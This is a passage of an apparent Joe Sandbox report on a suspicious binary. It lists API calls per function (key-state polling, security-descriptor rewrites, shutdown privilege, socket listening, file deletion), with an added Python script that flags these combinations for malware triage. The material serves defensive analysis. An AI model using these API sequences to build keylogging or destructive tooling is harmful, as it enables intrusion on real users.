                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: a34c3759c70cbad1a0c80fad0084c068621b4a3e58c456db43510d5d7ba22fa6
                                                                              • Instruction ID: 512f203ec127ae752da9b2e951902862e86c454ce9e9db55e50741e67042a06b
                                                                              • Opcode Fuzzy Hash: a34c3759c70cbad1a0c80fad0084c068621b4a3e58c456db43510d5d7ba22fa6
                                                                              • Instruction Fuzzy Hash: B54108345187D96DFF359B60880C7B9BFA96F22304F0480DDD5C6566C2EFA499C8C7A2
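The per-function call lists above are machine output: the modifier-key polling at 00902B5F (GetAsyncKeyState/GetKeyState on 0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN), the GetUserObjectSecurity/AddAce/SetUserObjectSecurity sequence at 008FA6D0, and the FindFirstFileW/DeleteFileW loop at 00906474. As an added example that is not part of the Joe Sandbox report, the Python script below parses call lines in exactly this format into records, decodes the virtual-key arguments, and applies a few API-combination rules of the kind an analyst would use to pick out blocks worth opening in a disassembler. The SAMPLE text is constructed from call lines shown on this page; the rule names and the VK_NAMES table (standard WinUser.h values) are my own. One caveat: the report flags the binary as a likely compiled AutoIt script, and if that is right, these routines are the AutoIt runtime's own library code (present in every AutoIt-compiled executable), so a rule hit says what the interpreter can do, not what the embedded script actually does; the script's behaviour has to be judged from the dynamic sections of the report, not from these static blocks.

```python
"""Added triage helper for Joe Sandbox per-function API call lists (not part of the report).
SAMPLE is constructed from call lines shown in this report; the rule labels are my own."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Win32 virtual-key codes (WinUser.h) that appear as GetAsyncKeyState/GetKeyState arguments.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
            0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}

# One call line: "• Func.MODULE(args), ref: ADDR" or "• Func.MODULE ref: ADDR",
# optionally prefixed with "Part of subcall function ADDR:".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class Call:
    func: str
    module: str
    args: list[str]          # raw values as printed; '?' is an argument the report could not recover
    ref: int                 # address of the call site
    subcall_of: int | None   # callee address when the line is a "Part of subcall" entry

@dataclass
class FunctionBlock:
    calls: list[Call] = field(default_factory=list)

    def names(self) -> set[str]:
        return {c.func for c in self.calls}

def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split the report at each 'APIs' header and parse the call lines that follow it."""
    blocks: list[FunctionBlock] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append(FunctionBlock())
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        if not blocks:                               # call lines before the first header
            blocks.append(FunctionBlock())
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        blocks[-1].calls.append(Call(m["func"], m["mod"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
    return blocks

# Behaviour rules: a block matches when it calls every API in the set.
RULES = [
    ("modifier-key state polling", {"GetAsyncKeyState", "GetKeyState"}),
    ("DACL rewrite on a user object (window station/desktop)",
     {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"}),
    ("directory walk with file deletion", {"FindFirstFileW", "FindNextFileW", "DeleteFileW"}),
    ("remote registry query", {"RegConnectRegistryW", "RegQueryValueExW"}),
    ("DCOM activation with explicit security blanket", {"CoInitializeSecurity", "CoCreateInstanceEx"}),
]

def decode_vk(call: Call) -> str | None:
    """Name the virtual key polled by a GetAsyncKeyState/GetKeyState call, or None if unknown."""
    if call.func not in ("GetAsyncKeyState", "GetKeyState") or not call.args:
        return None
    try:
        code = int(call.args[0], 16)
    except ValueError:                               # '?' or a non-numeric argument
        return None
    return VK_NAMES.get(code, f"VK_{code:02X}")

def triage(block: FunctionBlock) -> dict:
    """Rule hits, decoded key codes and subcall callees for one function block."""
    names = block.names()
    keys = {vk for vk in map(decode_vk, block.calls) if vk}
    return {"hits": [label for label, need in RULES if need <= names],
            "keys": sorted(keys),
            "subcalls": sorted({c.subcall_of for c in block.calls if c.subcall_of is not None})}

# Constructed sample: call lines copied from three function blocks of this report.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 00902B5F
• GetAsyncKeyState.USER32(000000A0), ref: 00902BE0
• GetKeyState.USER32(000000A0), ref: 00902BFB
• GetAsyncKeyState.USER32(000000A1), ref: 00902C15
• GetAsyncKeyState.USER32(00000011), ref: 00902C42
• GetAsyncKeyState.USER32(00000012), ref: 00902C6C
• GetAsyncKeyState.USER32(0000005B), ref: 00902C96
APIs
  • Part of subcall function 008FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 008FABD7
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008FA6D0
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008FA76E
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 008FA834
APIs
• __wsplitpath.LIBCMT ref: 0090645F
• FindFirstFileW.KERNEL32(?,?), ref: 00906474
• DeleteFileW.KERNEL32(?), ref: 009064DA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 009064EB
"""

if __name__ == "__main__":
    for block in parse_blocks(SAMPLE):
        print(triage(block))
```

Run it against a saved copy of the report's function listing instead of SAMPLE to get one triage record per block; blocks whose calls are all "Part of subcall" entries, or whose arguments are all "?", still parse, they just yield no decoded keys. The rules are deliberately conjunctive (every API in the set must be present) so that a lone GetKeyState or FindFirstFileW does not trip them.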
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                              • String ID:
                                                                              • API String ID: 1737998785-0
                                                                              • Opcode ID: ec8f7f38aec5ca3e011a4513b951085326ba7a72e3beaa93658459494a0a0c8c
                                                                              • Instruction ID: 6b94b1ba23a926428b2cbd8c93c90c832807cf093347bdf1bcac56d9bfe22871
                                                                              • Opcode Fuzzy Hash: ec8f7f38aec5ca3e011a4513b951085326ba7a72e3beaa93658459494a0a0c8c
                                                                              • Instruction Fuzzy Hash: 1E21BC39715114AFDB00AF28EC49F6D77A8FF45710F01841AF94ADB2A1CB74EC419B51
                                                                              APIs
                                                                                • Part of subcall function 008F9ABF: CLSIDFromProgID.OLE32 ref: 008F9ADC
                                                                                • Part of subcall function 008F9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 008F9AF7
                                                                                • Part of subcall function 008F9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 008F9B05
                                                                                • Part of subcall function 008F9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 008F9B15
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0091C235
                                                                              • _memset.LIBCMT ref: 0091C242
                                                                              • _memset.LIBCMT ref: 0091C360
                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0091C38C
                                                                              • CoTaskMemFree.OLE32(?), ref: 0091C397
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 0091C3E5
                                                                              Similarity
                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1300414916-2785691316
                                                                              • Opcode ID: c7992a3aeb0ef37290c8f62cb31c194a810aa1caccdc5775cc8d5b6cf50d0f55
                                                                              • Instruction ID: dc7ef5df9afdf8969832be4bda71d266e1e65d1458fc813b0ea1019f2ec99c2e
                                                                              • Opcode Fuzzy Hash: c7992a3aeb0ef37290c8f62cb31c194a810aa1caccdc5775cc8d5b6cf50d0f55
                                                                              • Instruction Fuzzy Hash: FA910971E4021CABDB10DFA4DC51EEEBBB9FF04710F10816AE519A7291DB709A45CFA1
                                                                              APIs
                                                                                • Part of subcall function 008FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008FB180
                                                                                • Part of subcall function 008FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008FB1AD
                                                                                • Part of subcall function 008FB134: GetLastError.KERNEL32 ref: 008FB1BA
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00907A0F
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                              • String ID: $@$SeShutdownPrivilege
                                                                              • API String ID: 2234035333-194228
                                                                              • Opcode ID: 92cc34ccd6b049371b61bce3af3512081ee7760d4011477b1a005d5ad4e3ff68
                                                                              • Instruction ID: b78be2f35c6652295162825e2258251bef357f129a7d4d3c4980c14c298b46f7
                                                                              • Opcode Fuzzy Hash: 92cc34ccd6b049371b61bce3af3512081ee7760d4011477b1a005d5ad4e3ff68
                                                                              • Instruction Fuzzy Hash: B201F775F692116EF72856F8CC5AFBFB35C9B00360F244824F953E20C2D9A4BE0091B1
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00918CA8
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918CB7
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00918CD3
                                                                              • listen.WSOCK32(00000000,00000005), ref: 00918CE2
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918CFC
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00918D10
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                              • String ID:
                                                                              • API String ID: 1279440585-0
                                                                              • Opcode ID: 63d98d23322bbd272a49609360b1e186455e847e44791913707a49773e5b7efb
                                                                              • Instruction ID: 41d98293093c04a9380b117acfeef7de6d60f8c2ae90bac4f63f6070959d1495
                                                                              • Opcode Fuzzy Hash: 63d98d23322bbd272a49609360b1e186455e847e44791913707a49773e5b7efb
                                                                              • Instruction Fuzzy Hash: 4221CE79601204AFCB10EF68D845FAEB7A9FF49310F108158E956A73D2CB30AD419B51
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00906554
                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00906564
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00906583
                                                                              • __wsplitpath.LIBCMT ref: 009065A7
                                                                              • _wcscat.LIBCMT ref: 009065BA
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009065F9
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                              • String ID:
                                                                              • API String ID: 1605983538-0
                                                                              • Opcode ID: 2030d59215f79c51c25975b21686a3593f2e0df4ce898b12975c7a69ae1cde71
                                                                              • Instruction ID: c6e1ec36a67a6b2df34c9c86ed0ae7322b610de5e4b3e6fe45bb942b15e911ab
                                                                              • Opcode Fuzzy Hash: 2030d59215f79c51c25975b21686a3593f2e0df4ce898b12975c7a69ae1cde71
                                                                              • Instruction Fuzzy Hash: 1C219275904258AFDB20ABA4CC88FEEB7BCAB49300F5004A5F505E3181EB75AF85CB61
                                                                              APIs
                                                                                • Part of subcall function 0091A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0091A84E
                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00919296
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009192B9
                                                                              Similarity
                                                                              • API ID: ErrorLastinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 4170576061-0
                                                                              • Opcode ID: 47ce090322393cc1d309741d9d1461974b16c202248e36f718dc9393511b03fb
                                                                              • Instruction ID: b1a860b94fc08d8274c3d9e62054e04b1f46785d0609139e9733aaf190fb3467
                                                                              • Opcode Fuzzy Hash: 47ce090322393cc1d309741d9d1461974b16c202248e36f718dc9393511b03fb
                                                                              • Instruction Fuzzy Hash: 6B41DC74600204AFDB14AB688896F7EB7EDEF44324F04894DF956EB3C2CB749D018B92
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0090EB8A
                                                                              • _wcscmp.LIBCMT ref: 0090EBBA
                                                                              • _wcscmp.LIBCMT ref: 0090EBCF
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0090EBE0
                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0090EC0E
                                                                              Similarity
                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 2387731787-0
                                                                              • Opcode ID: df4733442b82b8276682892ddc10cc7831a12cbb6c1ce154817c2d6d6e64f5e5
                                                                              • Instruction ID: 5ddb1c811af4d5fcab5ac249ebaf4997b73c341186fba2334d802b1429594817
                                                                              • Opcode Fuzzy Hash: df4733442b82b8276682892ddc10cc7831a12cbb6c1ce154817c2d6d6e64f5e5
                                                                              • Instruction Fuzzy Hash: 2441B0756047029FD708DF28C491E9AB3E8FF49324F10495EEA5ACB3A1DB32E940CB91
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: 84fad565fb1ba8ede23b1c2896ae923101b471c9f755c865a47495e632d0ffe1
                                                                              • Instruction ID: baf830b413aa5c26b3755d83f5ec2b293ecf97e5d99989ef30990332dcfc93e3
                                                                              • Opcode Fuzzy Hash: 84fad565fb1ba8ede23b1c2896ae923101b471c9f755c865a47495e632d0ffe1
                                                                              • Instruction Fuzzy Hash: 9E11BF3530A2256FE7216F2AEC44F6FBB9DEF55760B050429F849D72C2CF34E91286A1
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                              • API String ID: 0-1546025612
                                                                              • Opcode ID: 28089be5aaee1b380a91d37043c6f3c141d18e4b7e307554afdb42f5a0a1fc12
                                                                              • Instruction ID: df0d6001fc9f8d38b32bd2fd18c9ea5b67c6d1eba8ca4d287dc59a8b28db159d
                                                                              • Opcode Fuzzy Hash: 28089be5aaee1b380a91d37043c6f3c141d18e4b7e307554afdb42f5a0a1fc12
                                                                              • Instruction Fuzzy Hash: 01926B71E0121ACBDF28CF58C884BADB7B5FB54318F15819AE85AEB280D771DD81CB91
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,008DE014,74DF0AE0,008DDEF1,0095DC38,?,?), ref: 008DE02C
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008DE03E
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                              • API String ID: 2574300362-192647395
                                                                              • Opcode ID: 12fe2f7b4ace44311c49e431c6ca925ade4ce2133f3c4c418c2a34725f9b4019
                                                                              • Instruction ID: 19336c168d982843c0d083f1476da169626a6c5dd16dc4c173042950499aff13
                                                                              • Opcode Fuzzy Hash: 12fe2f7b4ace44311c49e431c6ca925ade4ce2133f3c4c418c2a34725f9b4019
                                                                              • Instruction Fuzzy Hash: 4DD0A739528B129FC7355F60EC08A1277D4FF05304F18841AE885D2650E7B4CC80C760
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009013DC
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: lstrlen
                                                                              • String ID: ($|
                                                                              • API String ID: 1659193697-1631851259
                                                                              • Opcode ID: 5fda6c4b5b51706ead70fb68d07d3b5f0711f2a83d254fd9005fddfb8302123f
                                                                              • Instruction ID: 146a0ec2754792908242eec0605bd6a1b10cdcaefbed8e8bb54dfef66f61a12a
                                                                              • Opcode Fuzzy Hash: 5fda6c4b5b51706ead70fb68d07d3b5f0711f2a83d254fd9005fddfb8302123f
                                                                              • Instruction Fuzzy Hash: 66322575A007059FC728CF69C480A6AB7F5FF48320B15C56EE59ADB3A2E770E981CB44
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 008DB22F
                                                                                • Part of subcall function 008DB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 008DB5A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Proc$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 2749884682-0
                                                                              • Opcode ID: 0e8600d8998358a7c9d913ed34ae0f6411eda3ed3db47f3e4d16f884b04bf1ea
                                                                              • Instruction ID: aa82dd595e74ece963af05283368b1be30af6a90f934b04ab73f04e0124b68a9
                                                                              • Opcode Fuzzy Hash: 0e8600d8998358a7c9d913ed34ae0f6411eda3ed3db47f3e4d16f884b04bf1ea
                                                                              • Instruction Fuzzy Hash: F5A14771118109FADB286A6A5C98E7F3B6CFB96368F12432FF441D23D5DB249C01A672
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009143BF,00000000), ref: 00914FA6
                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00914FD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                              • String ID:
                                                                              • API String ID: 599397726-0
                                                                              • Opcode ID: aad8f5919e48d1ddbac8e84617e2e437600bf3a9b9cf73a9e681593ba22a2583
                                                                              • Instruction ID: dc4cc17b8f6e7aaf0ecb7ad018501346be7063e07a18863bde1c84a90156d986
                                                                              • Opcode Fuzzy Hash: aad8f5919e48d1ddbac8e84617e2e437600bf3a9b9cf73a9e681593ba22a2583
                                                                              • Instruction Fuzzy Hash: FF41C7B170460DFFEB20DE94DC85EFF77BCEB84764F10406AF605A6281DA719E8196A0
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0090E20D
                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0090E267
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0090E2B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1682464887-0
                                                                              • Opcode ID: 98a444c59f6d9e0c7d35eae018eb708708f76c036bab7105356bc85340eb0ebf
                                                                              • Instruction ID: f40d5b7d5f4f115616b626953cfafe6271aa8d767d77bfe90154b6884444cabe
                                                                              • Opcode Fuzzy Hash: 98a444c59f6d9e0c7d35eae018eb708708f76c036bab7105356bc85340eb0ebf
                                                                              • Instruction Fuzzy Hash: AE213C75A10218EFCB00EFA9D885EADFBB8FF49310F0484AAE945E7391DB319915CB51
                                                                              APIs
                                                                                • Part of subcall function 008DF4EA: std::exception::exception.LIBCMT ref: 008DF51E
                                                                                • Part of subcall function 008DF4EA: __CxxThrowException@8.LIBCMT ref: 008DF533
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008FB180
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008FB1AD
                                                                              • GetLastError.KERNEL32 ref: 008FB1BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1922334811-0
                                                                              • Opcode ID: 9c2affe18922faf0db5c7299e117a764e50d2f38786e98f84a6a8181662efc3e
                                                                              • Instruction ID: da9ec689f16347e31a12e5d11c4d3a45da7fe65cada9275ae2f87039b1d84de9
                                                                              • Opcode Fuzzy Hash: 9c2affe18922faf0db5c7299e117a764e50d2f38786e98f84a6a8181662efc3e
                                                                              • Instruction Fuzzy Hash: 4F119EB2514209AFE728AF68DCC5D2BB7BDFF44714B20852EE55697241DB70FC818B60
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009066AF
                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009066EC
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009066F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                              • String ID:
                                                                              • API String ID: 33631002-0
                                                                              • Opcode ID: 4085f0f1b20976779de64ee26883a1d5aefe04a98eba163d0269f1376d5eed1a
                                                                              • Instruction ID: 448b0e91459c550f2aad9c239c089f73a6b4020504b374fa05394a8bb727c076
                                                                              • Opcode Fuzzy Hash: 4085f0f1b20976779de64ee26883a1d5aefe04a98eba163d0269f1376d5eed1a
                                                                              • Instruction Fuzzy Hash: 0011A1B5915228BEE7118BA8DC49FAFBBBCEB09718F104556F901E71D0C3B4AE0487A1
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00907223
                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0090723A
                                                                              • FreeSid.ADVAPI32(?), ref: 0090724A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                              • String ID:
                                                                              • API String ID: 3429775523-0
                                                                              • Opcode ID: d121f77c389cce7fbe623e2074a0fc7a385974f16b3fb792d8b5e436a6448553
                                                                              • Instruction ID: 4c4edd7e768881d89659b047e01d67e8554d239732e58b9165a8cee01523819c
                                                                              • Opcode Fuzzy Hash: d121f77c389cce7fbe623e2074a0fc7a385974f16b3fb792d8b5e436a6448553
                                                                              • Instruction Fuzzy Hash: 85F01D7AA15209BFDF04DFE4DD89EEEBBBCEF09201F104469A602E3191E2709A449B10
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0090F599
                                                                              • FindClose.KERNEL32(00000000), ref: 0090F5C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 158e4c367f4220a5d41b1bc3f2d8205e4b679f3bcbb450ab7ada37c8e075d5ac
                                                                              • Instruction ID: 1ed6569eca03b85137ed024a3496595895f1d34a0fb090f0cf992a9240f4de19
                                                                              • Opcode Fuzzy Hash: 158e4c367f4220a5d41b1bc3f2d8205e4b679f3bcbb450ab7ada37c8e075d5ac
                                                                              • Instruction Fuzzy Hash: 5A11A1716142009FD714EF28D845A2EB3E8FF99324F008A1EF9A5D7391CB30AD008B81
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0091BE6A,?,?,00000000,?), ref: 0090CEA7
                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0091BE6A,?,?,00000000,?), ref: 0090CEB9
